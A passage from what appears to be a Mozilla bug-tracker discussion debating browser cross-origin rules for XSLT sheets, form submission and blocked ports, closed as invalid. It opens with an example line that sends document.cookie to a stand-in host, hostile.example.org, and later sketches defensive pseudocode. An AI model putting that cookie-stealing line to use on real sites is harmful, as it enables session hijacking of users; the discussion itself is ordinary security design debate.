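   location.href = 'http://hostile.example.org/steal?c=' + escape(document.cookie);
   // The trusted site's session cookie arrives at the hostile server.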

> It's the same methods as any other system:
> 
> 1. Cookie exploit: if an XSLT sheet is returned differently based on the user's 
> cookie-based credentials, then a hostile site can infer details from the XSLT 
> sheet by applying the sheet to carefully-crafted documents.

That's not a cookie exploit.  That's an authentication exploit that may or may
not have anything to do with cookies.  However, in order to infer the contents
of an XSLT stylesheet, one would have to produce markup in the domain of the
stylesheet -- meaning that they'd already have to know the structure of the
documents the stylesheet applies to.  And if they already know about the
documents, which are what's going to contain the actual sensitive data, then
what they can infer about the stylesheet, at best, would be some clue as to what
the tags *the attacker already knew about* mean.

Regardless, the same exploit applies to CSS and scripts, but you don't see
anyone getting paranoid about local CSS files being leaked.

> 2. Intranet snooping exploit: if an XSLT sheet is inside an intranet, only 
> accessible to the user, a hostile site can effectively reverse engineer the 
> stylesheet by leading the user to a page and applying the transformation sheet 
> to numerous inputs in sequence and observing the results while the user is 
> visiting the hostile page.

These are stylesheets we're talking about, right?  Sensitive data isn't
something one puts into a stylesheet, it's something one puts into a document. 
Again, in order to reverse-engineer, the attacker would already have to know
about the contents of the documents the stylesheet is designed to operate on.

If I stored sensitive information in a CSS stylesheet, it would be very easily
leaked.  If the same is true for XSL, it's because BOTH ARE STYLESHEETS. 
Neither is designed to store actual information.

Besides, the problem is entirely moot if the hostile site doesn't get anything
back from the client.

> > >    onclick="location.href=..."
> > 
> > That's in response to a UI event, so it wouldn't be blocked.
> 
> That would be a security hole. It is trivial to trick users into clicking. For 
> example, the hostile page could be a game requiring clicking. Or it could be
> an innocent-looking page with many links, one of which just happens to be 
> hostile.
>
> >> All the sites that use <select> elements for navigation.
> > 
> > I consider onchange to be a UI event also.  Not blocked in this case.
> 
> I would not feel safe using a browser that let any page with select-based 
> navigation have full access to my hard drive, local network, and third party 
> sites (such as my bank), etc.
>

So the conclusion we're drawing here is that pages shouldn't be able to examine
the contents of other pages.  There's a reason innerHTML isn't in the W3 DOM.

The thing is, checking domains doesn't guarantee safety, either.  Suppose you're
a low-level employee of a major corporation.  You set up an exploit in your
user-space on the corporate website, and send the link to your supervisor;
suddenly, you have access to all of your co-workers' employment records and your
company's trade secrets.  And checking page origin doesn't stop that at all.

> >> Any page with a form that targets an IFrame.
> > 
> > You'll have to explain this case to me.  I don't know what bearing it has on
> > execution of autonomous scripts.
> 
> It is easy to trick users into clicking buttons. If you get a form to target an 
> iframe, then you can make that form fetch the content of a third party site
> (e.g. a bank) and then have the hostile page walk the DOM of this site to take 
> out of it whatever information it might want.

DOM-walking via iframes requires the use of innerHTML, an inherently unsafe
property.  Again, you could do the same with any site for which you can access
the domain.  What's to stop the bank's janitor from stealing credit card
information?  There's just no way to make it safe without verifying.

> > > Any page with a form that targets a non-HTTP port.
> > 
> > Again, I don't see the connection.
> 
> There have been exploits where (non-scripted, I believe) pages tricked users 
> into submitting forms that actually targetted SMTP servers with carefully 
> crafted content, such as to cause the servers to send e-mail (spam) on behalf of 
> the user.

And how is this being prevented currently?  I still don't see the relevance.

> > Also, I would whitelist W3C, so it would just be one prompt if any.
> 
> Whitelisting doesn't work when the whitelisted site is compromised and becomes a 
> hostile site (as happened recently with an IIS exploit -- IE users suddenly 
> found themselves attacked by what were previously considered trusted sites).

Yes, and signing into my online banking might reveal my account information if
my bank has been hacked.

> > One case would prompt the user, once.  I'd be much less annoyed that way than
> > having to tarball 5 XSLs with my document.
> 
> As a user, I would be a lot _less_ annoyed if I had no prompts and you had to 
> copy some XSLT files, than if I had a prompt and you could just use W3C 
> bandwidth instead of your own.

It's not about bandwidth -- it's about interoperability.  Blocking cross-domain
documents prevents a central information provider (W3C, Mozilla, Microsoft,
whatever) from being able to provide document formatting information to all
browsers.  What do we get instead?  Companies that adjust their browsers
*internally* to handle proprietary markup and attributes.

> > I'd also be happier that I'd be protected against cross-site attacks.
> 
> I hope I have explained why in fact you would be less protected than in the 
> current system (which simply blocks all such attempts rather than only blocking 
> those that didn't originate from user clicks).

But the current system doesn't block all such attempts.  It doesn't block
cross-site script injection at all, and I think that's a far more severe problem
than inferring the contents of stylesheets.

> > It's not a trivial workaround when the document doesn't fit your "all HTML is
> > served on a website" paradigm.  A lot of the document markup I'm doing these
> > days consists of documents to be sent to colleagues via email, so the added
> > steps of either printing to PDF or packaging XSL files cause quite a bit of
> > overhead.
> 
> Personally as a user I hate receiving attachments and would recommend just 
> putting the files on a server and e-mailing the URIs.

Well, I'd rather not make some of my documents publicly available, and I'd
rather not have to configure an HTTP server with authentication for every person
to whom I ever want to send a document.  Again, not all documents are suitable
for publishing on websites -- XML is designed for document markup, not just web
publishing.

> I don't understand how any of this relates to file:// URIs being 
> non-accessible from http:// URIs. Could you expand on exactly what 
> your use case is?

You've got the problem exactly reversed, actually.  I'm not trying to access a
file:// URI from an http:// URI, I'm trying to access an http:// URI from a
file:// URI.

> > Yes, but they'd be required in vastly different places -- and they'd cut down 
> > on the possibility of compromised servers being used for cross-site script
> > injection attacks.
> 
> Actually unless I really don't understand your proposal, the checks would be 
> needed in exactly the same places.

I'm saying move the checks from document-loading to scripting, since that's
where the hole originates -- maybe just set a flag when a script reads the
contents of another frame and warn if it submits a form after that happens.
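
(In pseudocode, the sort of bookkeeping I mean -- a conceptual sketch, not a
claim about how Gecko is structured:)

   // Conceptual sketch of the "taint and warn" idea.
   var scriptHasReadForeignContent = false;

   function noteCrossDocumentRead() {            // would be called wherever a script reads another document
     scriptHasReadForeignContent = true;
   }

   function scriptedSubmit(form, triggeredByUserEvent) {
     if (scriptHasReadForeignContent && !triggeredByUserEvent) {
       // show a warning / "blocked" indicator instead of submitting silently
       return false;
     }
     form.submit();
     return true;
   }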
> I'm not talking about hostile servers attacking a third-party site.

I am. I am talking about anything that your suggestion would expose Mozilla to.


> That's not a cookie exploit.  That's an authentication exploit

Whatever you call it, the point is we don't want to expose users to it.


> Regardless, the same exploit applies to CSS and scripts, but you don't see
> anyone getting paranoid about local CSS files being leaked.

Actually, people are. But CSS from other domains is significantly less easy to 
exploit.


> These are stylesheets we're talking about, right?

Transformation sheets, not stylesheets.


> Sensitive data isn't something one puts into a stylesheet, it's something one 
> puts into a document.

I'm just telling you the reasoning because you asked, I'm not asking you to 
agree with it (I was not involved in the decision here anyway).


> So the conclusion we're drawing here is that pages shouldn't be able to 
> examine the contents of other pages.

Which they aren't -- that's the whole point of all these cross-site scripting 
restrictions (JS from one site can't interact with the DOM of another). I 
thought you were arguing they should be?


> There's a reason innerHTML isn't in the W3 DOM.

Actually, it is (under another name, see DOM3 Load and Save); and even if it 
wasn't, it can be emulated using DOM1 Core methods.


> The thing is, checking domains doesn't guarantee safety, either.  Suppose 
> you're a low-level employee of a major corporation.  You set up an exploit in 
> your user-space on the corporate website, and send the link to your 
> supervisor; suddenly, you have access to all of your co-workers' employment 
> records and your company's trade secrets.  And checking page origin doesn't 
> stop that at all.

It's much easier than that -- just send your supervisor an executable. When the 
hostile party is trusted by the victim, the victim has already lost and 
technical solutions won't help.


> DOM-walking via iframes requires the use of innerHTML

No, it doesn't; see DOM1 Core.


> What's to stop the bank's janitor from stealing credit card
> information?  There's just no way to make it safe without verifying.

Untrusted bank employees aren't going to be given the keys to the vault.

In Web terms, and as far as internal intranet site exploits go, that's what SSL 
and authentication is for. Banks (at least banks that care about security) don't 
use cookies or any sort of persistent state for authentication, and so this 
isn't a problem. (I don't know about in the states, but here in Norway banks use 
time-sensitive electronic password generators, for instance.)


> > There have been exploits where (non-scripted, I believe) pages tricked users 
> > into submitting forms that actually targetted SMTP servers with carefully 
> > crafted content, such as to cause the servers to send e-mail (spam) on 
> > behalf of the user.
> 
> And how is this being prevented currently?  I still don't see the relevance.

It's being prevented by disallowing sites from accessing SMTP ports, a security 
measure along the lines of the measures you were describing as poor. (Actually 
sites are blocked from almost all ports except HTTP and SSL, IIRC.)
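
(Conceptually, the restriction looks something like this -- a sketch, not the
real networking code:)

   // Conceptual sketch of the port restriction.
   var BLOCKED_PORTS = [25, 110, 119, 143];           // SMTP, POP3, NNTP, IMAP, among others
   function isPortAllowed(port) {
     if (port === -1 || port === 80 || port === 443) return true;   // default / HTTP / SSL
     for (var i = 0; i < BLOCKED_PORTS.length; i++)
       if (BLOCKED_PORTS[i] === port) return false;
     return true;
   }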


> It's not about bandwidth -- it's about interoperability.  Blocking cross-
> domain documents prevents a central information provider (W3C, Mozilla, 
> Microsoft, whatever) from being able to provide document formatting 
> information to all browsers.  What do we get instead?  Companies that adjust 
> their browsers *internally* to handle proprietary markup and attributes.

Proprietary markup and attributes should never be sent over the wire so that's 
largely irrelevant. The Content MathML case is a very particular case, one of 
the few (maybe the only) legitimate use of client-side XSLT at the moment, and 
it is only the current (hopefully temporary) situation regarding lack of native 
support that is forcing authors to use this DOM-breaking solution.


> > I hope I have explained why in fact you would be less protected than in the 
> > current system (which simply blocks all such attempts rather than only 
> > blocking those that didn't originate from user clicks).
> 
> But the current system doesn't block all such attempts.  It doesn't block
> cross-site script injection at all, and I think that's a far more severe 
> problem than inferring the contents of stylesheets.

I can't see how your description of cross-site scripting is a client-side 
problem. Wouldn't it be possible to exploit a vulnerable server without using an 
innocent user's client at all?


> > I don't understand how any of this relates to file:// URIs being 
> > non-accessible from http:// URIs. Could you expand on exactly what 
> > your use case is?
> 
> You've got the problem exactly reversed, actually.  I'm not trying to access a
> file:// URI from an http:// URI, I'm trying to access an http:// URI from a
> file:// URI.

I thought we had established that that worked fine? Otherwise, I don't 
understand why in the early comments in this bug you were saying that the 
security hole was that file:// documents could access other file:// documents 
and submit their contents to the Web.


> I'm saying move the checks from document-loading to scripting, since that's
> where the hole originates -- maybe just set a flag when a script reads the
> contents of another frame and warn if it submits a form after that happens.

The practice of "tainting" data in this way is significantly more error-prone, 
significantly more costly in terms of performance, and would require 
significantly more code, than the current solution.

I am also very skeptical that this kind of exploit can only be performed via 
scripting.

I am also very skeptical, as I have said before, about prompting the user for 
issues that the user frankly doesn't know about. This would lower the overall 
security of the system, not increase it.



If accessing an http:// transformation sheet doesn't work from a file:// 
document, please file a new bug on the XSLT component requesting that it be 
allowed.

If you do not consider that XSLT documents on other domains can be exploited by 
loading them from hostile domains, then please file another new bug on the XSLT 
component requesting that it be allowed as well.

If you believe that file:// documents should not be allowed access to http:// 
documents, so as to prevent locally dropped files from sending data to remote 
servers, let me know. If this is not what this bug is about, please clarify 
exactly which exploit this bug refers to, given the comments so far.
(In reply to comment #13)
> If you believe that file:// documents should not be allowed access to http:// 
> documents, so as to prevent locally dropped files from sending data to remote 
> servers, let me know. If this is not what this bug is about, please clarify 
> exactly which exploit this bug refers to, given the comments so far.

Mostly I just don't think it's a good idea to allow javascript to transmit
information without the user's knowledge; but it sounds like disallowing that
would be impractical, so I'm just going to withdraw the bug.  Sorry for the trouble.
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → INVALID
Okie dokie. No problem!

[removing security-sensitive flag]
Group: security
Component: DOM: HTML → DOM: Core & HTML
QA Contact: ian → general